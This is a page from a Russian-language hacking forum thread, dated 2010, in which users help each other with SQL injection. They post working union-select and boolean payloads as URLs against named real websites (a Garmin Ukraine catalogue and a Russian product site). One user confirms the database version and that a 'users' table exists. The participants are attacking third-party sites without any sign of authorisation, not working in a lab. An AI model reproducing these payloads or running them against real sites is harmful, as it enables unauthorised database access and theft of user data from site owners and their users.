ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1203 из 1393 « Первая < 203703110311531193 1199 1200 1201 1202 1203 1204 1205 1206 1207 121312531303 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #12021  
Старый 16.03.2010, 09:09
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию
Цитата:
Сообщение от Nek1t  

Вот тут заминка: username>'последнего полученного_значения'
Это ничего не дало - записи выводятся так же с первой и до 1024 символа.
И то, что username - строковый параметр, не влияет на операцию сравнения?
Если у тя magic_quotes_gps on то надо привести к hex строку.
можно посмотреть на поле id и использовать его(оно зачастую auto_increment)
 
Ответить с цитированием

  #12022  
Старый 16.03.2010, 16:58
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538

Репутация: 23
По умолчанию
Все, разобрался, просто опечатался в запросе, а в hex знаю, что переводить надо.
Единственный вопрос, как быть с теми случаями, когда нет столбца с id?
 
Ответить с цитированием

  #12023  
Старый 16.03.2010, 17:57
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию
Цитата:
Сообщение от Nek1t  
Все, разобрался, просто опечатался в запросе, а в hex знаю, что переводить надо.
Единственный вопрос, как быть с теми случаями, когда нет столбца с id?
так я ж говорю, просто в твоём случае использовать username
 
Ответить с цитированием

  #12024  
Старый 16.03.2010, 18:24
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию
Подскажите вот сайт:
Цитата:
http://www.garmin.ua/catalog/maps/?id=1163%27
Я так понял, что это слепая инъекция. Т.е. количество полей возможно подобрать, так чтобы отобразилась страница 1163, но что делать дальше если нет принтабельных полей? Брутить? Если да то как это сделать?
З.Ы. Слепые инъекции - это типа blind?
 
Ответить с цитированием

  #12025  
Старый 16.03.2010, 18:31
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию
Код:
http://www.garmin.ua/catalog/maps/?id=1163+and+substring(version(),1,1)=4
4-ая ветка, есть табла users
 
Ответить с цитированием

  #12026  
Старый 16.03.2010, 18:33
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию
Цитата:
Сообщение от CyberHunter  
Подскажите вот сайт:

Я так понял, что это слепая инъекция. Т.е. количество полей возможно подобрать, так чтобы отобразилась страница 1163, но что делать дальше если нет принтабельных полей? Брутить? Если да то как это сделать?
З.Ы. Слепые инъекции - это типа blind?
Почему же она слепая????
Код:
http://www.garmin.ua/catalog/maps/?id=1163+and+1=2+union+select+null,version(),null,null,null,null,null,null,null+--+
Но версия всё равно 4ка
 
Ответить с цитированием

  #12027  
Старый 16.03.2010, 18:42
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию
Цитата:
Почему же она слепая????
Я так подумал, потому что не было ошибок
Хотел спросить что делает вот это: "+and+1=2" ?
И почему вместо 1,2,3,... пишется нулл,нулл,... ?
 
Ответить с цитированием

  #12028  
Старый 16.03.2010, 18:44
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию
Цитата:
Сообщение от CyberHunter  
Я так подумал, потому что не было ошибок
Хотел спросить что делает вот это: "+and+1=2" ?
И почему вместо 1,2,3,... пишется нулл,нулл,... ?
1111+and+1=2 (false) даёт в резальтате false(типа как -1).

а null это типо отсутствие значения
 
Ответить с цитированием

  #12029  
Старый 16.03.2010, 18:50
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию
Цитата:
Сообщение от Seravin  
1111+and+1=2 (false) даёт в резальтате false(типа как -1).

а null это типо отсутствие значения
Зачем его использовать непойму
-1 union select a,b --
Проще помоему =\
 
Ответить с цитированием

  #12030  
Старый 16.03.2010, 18:55
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию
Цитата:
Сообщение от Ctacok  
Зачем его использовать непойму
-1 union select a,b --
Проще помоему =\
1) это дело привычки
2)
Код:
http://kip.medaar.ru/prod.php?idsub=-1+union+select+1,2,3,4,5,6+--+&idkat=20&idsup=1
Код:
http://kip.medaar.ru/prod.php?idsub=105+and+1=2+union+select+1,2,3,4,5,6+--+&idkat=20&idsup=1
(долго это искал чтоб показать)
 
Ответить с цитированием
Ответ
Страница 1203 из 1393 « Первая < 203703110311531193 1199 1200 1201 1202 1203 1204 1205 1206 1207 121312531303 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ